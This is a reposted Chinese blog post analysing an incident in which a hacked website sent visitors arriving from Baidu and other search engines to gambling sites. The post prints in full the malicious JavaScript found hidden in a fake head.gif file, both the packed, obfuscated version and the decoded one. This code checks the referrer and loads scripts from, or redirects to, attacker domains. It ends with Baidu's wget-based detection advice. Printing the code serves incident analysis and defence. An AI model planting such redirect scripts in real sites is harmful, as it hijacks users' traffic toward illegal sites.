搜索引擎排名点击跳转问题解决办法

最新推荐文章于 2021-06-16 15:26:30 发布

weixin_30387423

最新推荐文章于 2021-06-16 15:26:30 发布

阅读量292

点赞数

文章标签： javascript 操作系统 java ViewUI

原文链接：http://www.cnblogs.com/shhxpump/p/3214571.html

版权

这是一个比较现实的问题，那就是现在的黑客经常用跳转的方式来博得网站流量个人觉得说得还不错，所以在此分享一下，也希望碰到同样问题的朋友能够尽快解决这样的问题。我终于找到了一个我认为比较有内涵的文章。

网址：http://blog.csdn.net/bill_hjyh/article/details/7457894

案例：XX主页从搜索引擎打开会变为六H彩，直接输入网址一切正常，什么原理呢

分析原因：1.机房arp攻击2,。被插入恶意代码

检测步骤：

1.查找安全软件日志，定位作乱的mac地址，查阅ip/mac表，检查对应主机（发现是一台曾经被黑的主机时间大概2011年1到2月份）

2.查找恶意代码，使用dreamever的查找功能，全站检索关键词无果，怀疑js或者css引用，再次查看无果。

3.最笨的方法开始，用文本编辑器Editplus挨个点击图片jpg、gif，swf等文件，查到一个恶意图片文件。

============================恶意文件head.gif================================================

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l="";k d=9.m;n((d.2("%1%p%o%1%j%g%1%c%f")>0)||(d.2("8=%7%6%a%3%4%5")>0)||(d.2("8=%3%q%r%A%7%6%a%3%4%5")>0)){9.s("<b u=v:\\/\\/x.w.y.\\/t\\/z.D ><\\/b>")}B{i.C.h="e.E"}',41,41,'|E5|indexOf|CF|B2|CA|F9|C1|wd|document|BA|script|BD||index|A9|88|href|window|90|var|GIF89a|referrer|if|AD|85|E3|B8|writeln|pic|src|http|89614|www|com|bby|DB|else|location|gif|aspx'.split('|'),0,{}))

============================================================================================

看到eval(function(p,a,c,k,e,d)

推测javascript语句，使用google，而不是百度，很纠结（百度里谷歌一下）

找到一种解决加密的方式

新建一个html文档

==================================================

<textareaname=tttstyle='width:100%;height:300' ></textarea>
<script type=text/javascript>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}ttt.value=p;}('l="";k d=9.m;n((d.2("%1%p%o%1%j%g%1%c%f")>0)||(d.2("8=%7%6%a%3%4%5")>0)||(d.2("8=%3%q%r%A%7%6%a%3%4%5")>0)){9.s("<b u=v:\\/\\/x.w.y.\\/t\\/z.D ><\\/b>")}B{i.C.h="e.E"}',41,41,'|E5|indexOf|CF|B2|CA|F9|C1|wd|document|BA|script|BD||index|A9|88|href|window|90|var|GIF89a|referrer|if|AD|85|E3|B8|writeln|pic|src|http|89614|www|com|bby|DB|else|location|gif|aspx'.split('|'),0,{}))

</script>======================================================================================

红色代码部分return p修改为xxx.value=p ，xxx这里随便输入一个ttt，和标题对应

浏览器打开

============================================================================================

GIF89a="";var d=document.referrer;if((d.indexOf("%E5%85%AD%E5%90%88%E5%BD%A9")>0)||(d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){document.writeln("<script src=http:\/\/www.89614.com.\/pic\/bby.gif ><\/script>")}else{window.location.href="index.aspx"}

====================================================================================================

再次得到一个地址，

迅雷下载，直接浏览器是打不开的

==========================================

GIF89a="";
var d=document.referrer;
var re=/((wd|q|w|p|query)(=)([%A-Z0-9]*)(%C1%F9%BA%CF%B2%CA|%E5%85%AD%E5%90%88%E5%BD%A9))|((wd|q|w|p|query)(=)([%A-Z0-9]*)(%CC%D8%C2%EB|%E7%89%B9%E7%A0%81))|((wd|q|w|p|query)(=)([%A-Z0-9]*)(%C8%FC%C2%ED%BB%E1|%E8%B5%9B%E9%A9%AC%E4%BC%9A))|((wd|q|w|p|query)(=)([%A-Z0-9]*)(%B0%D7%D0%A1%BD%E3|%E7%99%BD%E5%B0%8F%E5%A7%90))/;
if(re.test(d)){
document.writeln("<script src=http:\/\/www.cy099.com.\/pic\/bbyy.gif><\/script>");
}
=============================================
再次一段地址

===========================================================================================

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("google")>0)||(d.indexOf("sogou")>0)||(d.indexOf("soso")>0)){
if((d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA%CC%D8%C2%EB")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA%D7%CA%C1%CF")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA%B9%AB%CB%BE")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA%CD%F8%D5%BE")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA%CD%BC%BF%E2")>0)||(d.indexOf("wd=%C1%F9%BA%CF%B2%CA%BF%AA%BD%B1%BD%E1%B9%FB")>0)){
//alert("");
//window.close();
//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");

}
else{
if((window.location.href.indexOf("sxuec")>0)||(window.location.href.indexOf("hust")>0)||(window.location.href.indexOf("neimu")>0)||(window.location.href.indexOf("cnautonews")>0)){

//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");

}
else{
//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");
}
}
}
====================================================

元凶找到，nnd，时间过去了4个小时，

===================================================================

原理分析

引用前人，不是原创（有修改）

从百度里搜索我的网站排名的关键词，在排名的搜索结果页面点击想进入网站，可是打开后立刻跳转的一些非法网站上去了，就连直接搜索网址的结果页也是这样。可是如果在浏览器的地址栏里输入自己网站的网址却能正常进去浏览网站。最终的结论只有一个，很多的非法网站通过病毒攻击劫持了你网站通过搜索引擎来的流量。

这种搜索引擎流量劫持到底是怎么回事呢，原理是什么，需要怎么改正？

搜索引擎流量劫持流程图：

让我们从头开始讲起。

细心的朋友们可能已经发现了，如果我们直接输入被暗链攻击的网站的网址，是一切正常OK的；但是如果从百度的搜索结果中直接点击，就会跳转到非法网站中去，而且之前百度搜索结果页面也变成非法网站了。这到底是怎么回事儿？原来都是那个head.gif文件在装怪。

可是，看上去这不过就是个gif图片文件嘛，直接在浏览器中打开，还无法浏览呢。别急，让我们看看这个文件的真面目，它可是画过妆的。来看head.gif文件里面到底有什么：

GIF89a="";

var d=document.referrer;

((d.indexOf("%E5%85%AD%E5%90%88%E5%BD%A9")>0)|| /*wd=六H彩*/

(d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)|| /*wd=六H彩*/

(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)) /*wd=香G六H彩*/

{

document.writeln("<script src=http:\/\/www.89614.com.\/pic\/bby.gif ><\/script>")

}

else

{window.location.href="index.aspx"}

这个head.gif文件并不是一个图片文件，而是一个JavaScript文件，不过是改了一个后缀名，其实一样可以正常运行。这下就不难理解了，无论是我们手动输入网址，还是从百度直接点击过来，由于网站已经被暗链攻击了，其默认页面被设置成了这个head.gif文件，这个文件会通过HTTP Referrer来判断用户是从哪里来的。如果是用户手动输入的，则打开网站原来的index。aspx页面；如果来自百度搜索，那就跳转到另一个gif 文件：http:\/\/www.89614.com.\/pic\/bby.gif

看上去这也是一个gif文件呀，不过有了上面的例子，都应该可以猜到，其实这也是一个改了后缀名的JavaScript文件，

(re.test(d)){
document.writeln("<script src=http:\/\/www.cy099.com.\/pic\/bbyy.gif><\/script>");
}

========================================================================

转码看着舒服点，居然用了可恶的gb2312编码，还香港公司呢，怎么不用utf

===============================================================

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=六H彩")>0)||(d.indexOf("wd=香港六H彩")>0)|| (d.indexOf("google")>0)||(d.indexOf("sogou")>0)||(d.indexOf("soso")>0)){
if((d.indexOf("wd=香港六H彩特码")>0)||(d.indexOf("wd=香港六H彩资料")>0)||(d.indexOf("wd=香港六H彩公司")> 0)||(d.indexOf("wd=香港六H彩网站")>0)||(d.indexOf("wd=香港六H彩图库")>0)|| (d.indexOf("wd=六H彩开奖结果")>0)){
//alert("");
//window.close();
//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");

}
else{
if((window.location.href.indexOf("sxuec")>0)||(window.location.href.indexOf("hust")>0)||(window.location.href.indexOf("neimu")>0)||(window.location.href.indexOf("cnautonews")>0)){

//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");

}
else{
//window.open("http://www.97690.com.0597un.com./");
window.location.href="http://www.97690.com.0597un.com./";
window.opener.navigate("http://www.97569.com.0597un.com./");
}
}
}
======================================================================================

哦，这个文件就更加清楚了，它也在做判断，

如果来自百度搜索结果，谷歌结果，soso结果，搜狗结果

那就跳转到非法网站去，否则什么都不干。

至此，一次暗链攻击就已经完成了

=========================================================================================

暗链攻击要获得成功的话，需要具备这些前提条件：

当用户直接访问正规网站的时候，恶意文件会将用户的http请求转跳到正常页面，于是用户不容易发现网站异常；但是如果用户是从搜索结果页面点进进入的话，该恶意文件就会将用户http请求转跳到非法网站。

这样做对黑客有什么好处呢？很明显，正规网站在搜索结果中的排名往往比较靠前，如果被植入恶意文件，搜索引擎的蜘蛛也会被跳转到该非法网站（我猜的，有待考证），由于搜索引擎目前还无法识别出这个网站被攻击了，于是误以为这个正规网站的域名下面，放的是该非法网站的内容，于是照常收录。再后来，用户在进行搜索的时候，就会出现点击了该正规网站的链接，打开的却是非法网站。

原文来自：

=====================================================================================================================

攻击行为还原，反推攻击步骤

========================================

首先，攻击者通过某种手段获得了网站的控制权；

接着，把该网站首页添加了能让百度等搜索引擎找到的某些关键词；

然后，在首页引用到的JS文件中添加了一段经过包装（packed）的脚本，该脚本会使浏览器自动请求其他域的一个特制的gif文件，该gif文件其实包含了一段能够判断请求是否来自搜索引擎，从而使浏览器重定向到某六*合*彩网站的JS脚本。

这样，当受害者在搜索引擎搜“ 六*合*彩”等关键词并且点击搜索结果的链接，就会被重定向到某六*合*彩网站。

里面主要是利用了document.referrer这个HTML DOM 属性

===========================================================

分析过程：

1、打开百度，搜索 “xx学校” ；

2、打开Wireshark，启动监听，点击搜索结果里出现的某xx网站的链接；

3、等某政府网站被重定向到某六*合*彩网站完毕后停止监听；

4、分析监听记录，可以看到攻击者在内容最后都被添加了一段经过包装（packed）的JS脚本：

============转换java加密的代码，存为html即可===============================

<textarea name=ttt style='width:100%;height:300' ></textarea>
<script type=text/javascript>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}ttt.value=p;}('l="";k d=9.m;n((d.2("%1%p%o%1%j%g%1%c%f")>0)||(d.2("8=%7%6%a%3%4%5")>0)||(d.2("8=%3%q%r%A%7%6%a%3%4%5")>0)){9.s("<b u=v:\\/\\/x.w.y.\\/t\\/z.D ><\\/b>")}B{i.C.h="e.E"}',41,41,'|E5|indexOf|CF|B2|CA|F9|C1|wd|document|BA|script|BD||index|A9|88|href|window|90|var|GIF89a|referrer|if|AD|85|E3|B8|writeln|pic|src|http|89614|www|com|bby|DB|else|location|gif|aspx'.split('|'),0,{}))

</script>

===============================

百度给出的解释

我的网站被标记风险标志，但标题和描述都与我网站无关，是不是百度弄错了？

百度搜索结果中展现的内容，是对所抓取页面的真实反映。若出现了您所述的情况，并非是百度搜索的问题，而是您的网站遭到黑客篡改所致。黑客通过侵入您的网站，添加针对百度蜘蛛抓取的页面，这样百度收录到页面便与您网站的内容毫不相关，因而在搜索结果中显示的标题和摘要内容自然也与您的网站无关。

此类被黑是针对网站UA（user-agent）进行的，在此为您提供两条检查的方法以供参考：
1）linux 下可使用wget命令：
wget http://xxxxxx/xx -UBaiduspider -O baiduUA.html
wget http://xxxxxx/xx -O nullUA.html
打开文件baiduUA.html，nullUA.html，对比内容是否一致，若不一致证明服务器对不同UA返回不同结果。如果您没有设置服务器，那么您的网站就是被黑了。
2）使用firefox 插件 user agent switcher，设置不同的user agent，然后用firefox打开您的首页，如果页面不一致且您并没有设置服务器，那么您的网站就是被黑了。
请您务必及时检查并修复您的网站，或寻求技术人员的帮助，以减小由此带来的损失。

为什么我在浏览我的网站时没有发现问题，在百度搜索中却会被标记风险标志？

通过其他途径浏览网站没有发现问题，并不代表网站没有被黑。由于百度搜索是影响力较大的搜索引擎，目前国内站点的首页被黑，一半以上是仅针对百度搜索的。也就是说，只有通过百度搜索结果点击进入网站时，被黑的情况才会展现出来。

具体来讲，黑客通过侵入您的网站，添加针对来自百度搜索用户才会展现的页面，这样一来用户再通过百度搜索进入您的网站时展现的便是黑客制造的页面，而直接访问和通过其他搜索引擎的访问时，这些被黑页面是不会展现出来的。这对您的网站和网站用户的伤害极大，请您及时对网站进行检查并修复。
对于此类针对网站referer功能的黑客行为，我们提供两条具体检查方法以供您或者网站技术人员参考：
1）linux 下可使用wget命令：
wget http://xxxxxx/xx --referer=http://www.baidu.com/s?wd=abc -O baiduREF.html
wget http://xxxxxx/xx -O nullREF.html
打开文件baiduREF.html，nullREF.html，对比内容是否一致，若不一致证明服务器对不同referer返回不同结果。如果您没有设置服务器，那么您的网站就是被黑了。
2）使用firefox 插件 RefControl，设置不同的referer，然后用firefox打开您的首页，如果不同referer打开的页面不一致且您并没有设置服务器，那么您的网站就是被黑了。

我的网站提示存在风险，如何快速检查出网站存在的异常呢？

site语法检索是最常用的检查方式，即在搜索框输入"site:您的网站域名" （例：site:baidu.com），查看网站收录情况，是否出现页面数量暴增，或目录异常的现象，并观察搜索结果中的标题和摘要内容是否与网站内容相关。也可通过检索"site:您的网站域名被黑热门词"的形式来筛选出被黑内容（例：site:baidu.com 六H彩）。被黑热门词一般集中在游戏类和色情类，如"六H彩"、"qq刷Z"、"成R电影"等。

转载于:https://www.cnblogs.com/shhxpump/p/3214571.html

weixin_30387423

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
搜索引擎排名点击跳转问题解决办法

这是一个比较现实的问题，那就是现在的黑客经常用跳转的方式来博得网站流量个人觉得说得还不错，所以在此分享一下，也希望碰到同样问题的朋友能够尽快解决这样的问题。我终于找到了一个我认为比较有内涵的文章。网址：http://blog.csdn.net/bill_hjyh/article/details/74578940案例：XX主页从搜索引擎打开会变为六H彩，直接输入网址一切正常，...
复制链接

扫一扫